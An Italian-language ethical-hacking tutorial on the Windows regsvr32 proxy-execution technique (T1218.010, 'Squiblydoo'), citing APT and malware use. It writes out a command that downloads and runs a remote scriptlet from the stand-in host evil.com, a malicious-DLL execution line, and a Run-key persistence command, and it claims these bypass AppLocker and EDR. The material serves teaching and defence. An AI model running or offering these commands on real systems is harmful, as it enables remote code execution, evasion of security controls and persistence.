Esecuzione Proxy via Regsvr32: System Binary Proxy Execution - Regsvr32 (T1218.010)

Regsvr32.exe rappresenta uno dei binari di sistema Windows più abusati per aggirare i controlli di sicurezza. Questo strumento legittimo, nato per registrare componenti COM e DLL, è diventato un vettore privilegiato per eseguire codice malevolo sotto il radar dei sistemi di protezione.

La tecnica rientra nella tattica TA0005 (Defense Evasion), permettendo agli attaccanti di mascherare l'esecuzione di payload malevoli dietro un processo firmato Microsoft. Il binario può caricare ed eseguire scriptlet COM remoti senza modificare il registro, una variante nota come "Squiblydoo" che ha colpito diversi governi.

I numeri parlano chiaro: 11 gruppi APT documentati utilizzano questa tecnica, insieme a 23 famiglie di malware e 2 campagne di alto profilo. La firma digitale Microsoft e l'uso legittimo frequente rendono questo vettore particolarmente insidioso per i difensori.

La versatilità di regsvr32.exe offre molteplici vettori d'attacco. Il comando base per eseguire uno scriptlet remoto è sorprendentemente semplice: regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Questo bypassa completamente AppLocker e molte soluzioni EDR, caricando codice arbitrario dalla rete. Il parametro /s sopprime i messaggi, /n evita di chiamare DllRegisterServer, mentre /u e /i permettono di specificare l'URL dello scriptlet.

Per testare in laboratorio, crea prima uno scriptlet COM malevolo salvandolo come file .sct con codice JScript o VBScript embedded. Blue Mockingbird ha dimostrato l'efficacia di questa tecnica caricando miner XMRIG personalizzati tramite DLL appositamente compilate. La catena d'attacco prevede hosting dello scriptlet su server controllato, esecuzione via regsvr32 con URL remoto, e injection del payload in memoria senza toccare disco.

Un approccio alternativo sfrutta file locali: regsvr32.exe /s C:\Temp\malicious.dll. Questo metodo richiede di droppare prima il file sul sistema target, ma risulta meno sospetto a livello di traffico di rete.

Per persistence avanzata, Inception ha dimostrato l'uso combinato con chiavi di registro: impostando regsvr32 %path%\ctfmonrn.dll /s nelle Run Keys si garantisce esecuzione ad ogni avvio. Il tool Covenant automatizza la generazione di file SCT per deployment rapido di nuovi listener Grunt.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.